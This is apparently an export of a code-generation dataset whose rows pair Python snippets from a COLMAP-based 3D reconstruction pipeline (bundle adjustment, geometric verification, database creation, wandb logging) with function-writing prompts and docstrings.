import numpy as np
from src.utils.colmap.read_write_model import read_model
from src.utils.data_utils import get_K_crop_resize, get_image_crop_resize
from src.utils.vis_utils import reproj
def pack_extract_data(img_path):
image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)
image = image[None] / 255.0
return torch.Tensor(image) | null |
14,549 | import os.path as osp
import time
import cv2
import torch
import numpy as np
from src.utils.colmap.read_write_model import read_model
from src.utils.data_utils import get_K_crop_resize, get_image_crop_resize
from src.utils.vis_utils import reproj
def pack_match_data(db_detection, query_detection, db_size, query_size):
data = {}
for k in db_detection.keys():
data[k + "0"] = db_detection[k].__array__()
for k in query_detection.keys():
data[k + "1"] = query_detection[k].__array__()
data = {k: torch.from_numpy(v)[None].float().cuda() for k, v in data.items()}
data["image0"] = torch.empty(
(
1,
1,
)
+ tuple(db_size)[::-1]
)
data["image1"] = torch.empty(
(
1,
1,
)
+ tuple(query_size)[::-1]
)
return data | null |
14,550 | from pytorch_lightning.loggers import WandbLogger
import wandb
from pytorch_lightning import Callback
import pytorch_lightning as pl
import torch
from sklearn.metrics import precision_score, recall_score, f1_score
from typing import List
import glob
import os
def get_wandb_logger(trainer: pl.Trainer) -> WandbLogger:
logger = None
for lg in trainer.logger:
if isinstance(lg, WandbLogger):
logger = lg
if not logger:
raise Exception(
"You're using wandb related callback, "
"but WandbLogger was not found for some reason..."
)
return logger | null |
14,551 | import os
import logging
import subprocess
import os.path as osp
from pathlib import Path
def run_bundle_adjuster(deep_sfm_dir, ba_dir, colmap_path):
logging.info("Running the bundle adjuster.")
deep_sfm_model_dir = osp.join(deep_sfm_dir, 'model')
cmd = [
str(colmap_path), 'bundle_adjuster',
'--input_path', str(deep_sfm_model_dir),
'--output_path', str(ba_dir),
'--BundleAdjustment.max_num_iterations', '150',
'--BundleAdjustment.max_linear_solver_iterations', '500',
'--BundleAdjustment.function_tolerance', '0',
'--BundleAdjustment.gradient_tolerance', '0',
'--BundleAdjustment.parameter_tolerance', '0',
'--BundleAdjustment.refine_focal_length', '0',
'--BundleAdjustment.refine_principal_point', '0',
'--BundleAdjustment.refine_extra_params', '0',
'--BundleAdjustment.refine_extrinsics', '1'
]
logging.info(' '.join(cmd))
ret = subprocess.call(cmd)
if ret != 0:
logging.warning('Problem with point_triangulator, existing.')
exit(ret) | null |
14,552 | import os
import h5py
import logging
import tqdm
import subprocess
import os.path as osp
import numpy as np
from pathlib import Path
from src.utils.colmap.read_write_model import CAMERA_MODEL_NAMES, Image, read_cameras_binary, read_images_binary
from src.utils.colmap.database import COLMAPDatabase
The provided code snippet includes necessary dependencies for implementing the `geometric_verification` function. Write a Python function `def geometric_verification(colmap_path, database_path, pairs_path)` to solve the following problem:
Geometric verfication
Here is the function:
def geometric_verification(colmap_path, database_path, pairs_path):
""" Geometric verfication """
logging.info('Performing geometric verification of the matches...')
cmd = [
str(colmap_path), 'matches_importer',
'--database_path', str(database_path),
'--match_list_path', str(pairs_path),
'--match_type', 'pairs'
]
ret = subprocess.call(cmd)
if ret != 0:
logging.warning('Problem with matches_importer, existing.')
exit(ret) | Geometric verfication |
14,553 | import os
import h5py
import logging
import tqdm
import subprocess
import os.path as osp
import numpy as np
from pathlib import Path
from src.utils.colmap.read_write_model import CAMERA_MODEL_NAMES, Image, read_cameras_binary, read_images_binary
from src.utils.colmap.database import COLMAPDatabase
CAMERA_MODEL_NAMES = dict([(camera_model.model_name, camera_model)
for camera_model in CAMERA_MODELS])
def read_cameras_binary(path_to_model_file):
"""
see: src/base/reconstruction.cc
void Reconstruction::WriteCamerasBinary(const std::string& path)
void Reconstruction::ReadCamerasBinary(const std::string& path)
"""
cameras = {}
with open(path_to_model_file, "rb") as fid:
num_cameras = read_next_bytes(fid, 8, "Q")[0]
for _ in range(num_cameras):
camera_properties = read_next_bytes(
fid, num_bytes=24, format_char_sequence="iiQQ")
camera_id = camera_properties[0]
model_id = camera_properties[1]
model_name = CAMERA_MODEL_IDS[camera_properties[1]].model_name
width = camera_properties[2]
height = camera_properties[3]
num_params = CAMERA_MODEL_IDS[model_id].num_params
params = read_next_bytes(fid, num_bytes=8*num_params,
format_char_sequence="d"*num_params)
cameras[camera_id] = Camera(id=camera_id,
model=model_name,
width=width,
height=height,
params=np.array(params))
assert len(cameras) == num_cameras
return cameras
def read_images_binary(path_to_model_file):
"""
see: src/base/reconstruction.cc
void Reconstruction::ReadImagesBinary(const std::string& path)
void Reconstruction::WriteImagesBinary(const std::string& path)
"""
images = {}
with open(path_to_model_file, "rb") as fid:
num_reg_images = read_next_bytes(fid, 8, "Q")[0]
for _ in range(num_reg_images):
binary_image_properties = read_next_bytes(
fid, num_bytes=64, format_char_sequence="idddddddi")
image_id = binary_image_properties[0]
qvec = np.array(binary_image_properties[1:5])
tvec = np.array(binary_image_properties[5:8])
camera_id = binary_image_properties[8]
image_name = ""
current_char = read_next_bytes(fid, 1, "c")[0]
while current_char != b"\x00": # look for the ASCII 0 entry
image_name += current_char.decode("utf-8")
current_char = read_next_bytes(fid, 1, "c")[0]
num_points2D = read_next_bytes(fid, num_bytes=8,
format_char_sequence="Q")[0]
x_y_id_s = read_next_bytes(fid, num_bytes=24*num_points2D,
format_char_sequence="ddq"*num_points2D)
xys = np.column_stack([tuple(map(float, x_y_id_s[0::3])),
tuple(map(float, x_y_id_s[1::3]))])
point3D_ids = np.array(tuple(map(int, x_y_id_s[2::3])))
images[image_id] = Image(
id=image_id, qvec=qvec, tvec=tvec,
camera_id=camera_id, name=image_name,
xys=xys, point3D_ids=point3D_ids)
return images
class COLMAPDatabase(sqlite3.Connection):
def connect(database_path):
return sqlite3.connect(str(database_path), factory=COLMAPDatabase)
def __init__(self, *args, **kwargs):
super(COLMAPDatabase, self).__init__(*args, **kwargs)
self.create_tables = lambda: self.executescript(CREATE_ALL)
self.create_cameras_table = \
lambda: self.executescript(CREATE_CAMERAS_TABLE)
self.create_descriptors_table = \
lambda: self.executescript(CREATE_DESCRIPTORS_TABLE)
self.create_images_table = \
lambda: self.executescript(CREATE_IMAGES_TABLE)
self.create_two_view_geometries_table = \
lambda: self.executescript(CREATE_TWO_VIEW_GEOMETRIES_TABLE)
self.create_keypoints_table = \
lambda: self.executescript(CREATE_KEYPOINTS_TABLE)
self.create_matches_table = \
lambda: self.executescript(CREATE_MATCHES_TABLE)
self.create_name_index = lambda: self.executescript(CREATE_NAME_INDEX)
def add_camera(self, model, width, height, params,
prior_focal_length=False, camera_id=None):
params = np.asarray(params, np.float64)
cursor = self.execute(
"INSERT INTO cameras VALUES (?, ?, ?, ?, ?, ?)",
(camera_id, model, width, height, array_to_blob(params),
prior_focal_length))
return cursor.lastrowid
def add_image(self, name, camera_id,
prior_q=np.zeros(4), prior_t=np.zeros(3), image_id=None):
cursor = self.execute(
"INSERT INTO images VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",
(image_id, name, camera_id, prior_q[0], prior_q[1], prior_q[2],
prior_q[3], prior_t[0], prior_t[1], prior_t[2]))
return cursor.lastrowid
def add_keypoints(self, image_id, keypoints):
assert(len(keypoints.shape) == 2)
assert(keypoints.shape[1] in [2, 4, 6])
keypoints = np.asarray(keypoints, np.float32)
self.execute(
"INSERT INTO keypoints VALUES (?, ?, ?, ?)",
(image_id,) + keypoints.shape + (array_to_blob(keypoints),))
def add_descriptors(self, image_id, descriptors):
descriptors = np.ascontiguousarray(descriptors, np.uint8)
self.execute(
"INSERT INTO descriptors VALUES (?, ?, ?, ?)",
(image_id,) + descriptors.shape + (array_to_blob(descriptors),))
def add_matches(self, image_id1, image_id2, matches):
assert(len(matches.shape) == 2)
assert(matches.shape[1] == 2)
if image_id1 > image_id2:
matches = matches[:,::-1]
pair_id = image_ids_to_pair_id(image_id1, image_id2)
matches = np.asarray(matches, np.uint32)
self.execute(
"INSERT INTO matches VALUES (?, ?, ?, ?)",
(pair_id,) + matches.shape + (array_to_blob(matches),))
def add_two_view_geometry(self, image_id1, image_id2, matches,
F=np.eye(3), E=np.eye(3), H=np.eye(3), config=2):
assert(len(matches.shape) == 2)
assert(matches.shape[1] == 2)
if image_id1 > image_id2:
matches = matches[:,::-1]
pair_id = image_ids_to_pair_id(image_id1, image_id2)
matches = np.asarray(matches, np.uint32)
F = np.asarray(F, dtype=np.float64)
E = np.asarray(E, dtype=np.float64)
H = np.asarray(H, dtype=np.float64)
self.execute(
"INSERT INTO two_view_geometries VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
(pair_id,) + matches.shape + (array_to_blob(matches), config,
array_to_blob(F), array_to_blob(E), array_to_blob(H)))
The provided code snippet includes necessary dependencies for implementing the `create_db_from_model` function. Write a Python function `def create_db_from_model(empty_model, database_path)` to solve the following problem:
Create COLMAP database file from empty COLMAP binary file.
Here is the function:
def create_db_from_model(empty_model, database_path):
""" Create COLMAP database file from empty COLMAP binary file. """
if database_path.exists():
logging.warning('Database already exists.')
cameras = read_cameras_binary(str(empty_model / 'cameras.bin'))
images = read_images_binary(str(empty_model / 'images.bin'))
db = COLMAPDatabase.connect(database_path)
db.create_tables()
for i, camera in cameras.items():
model_id = CAMERA_MODEL_NAMES[camera.model].model_id
db.add_camera(model_id, camera.width, camera.height, camera.params,
camera_id=i, prior_focal_length=True)
for i, image in images.items():
db.add_image(image.name, image.camera_id, image_id=i)
db.commit()
db.close()
return {image.name: i for i, image in images.items()} | Create COLMAP database file from empty COLMAP binary file. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.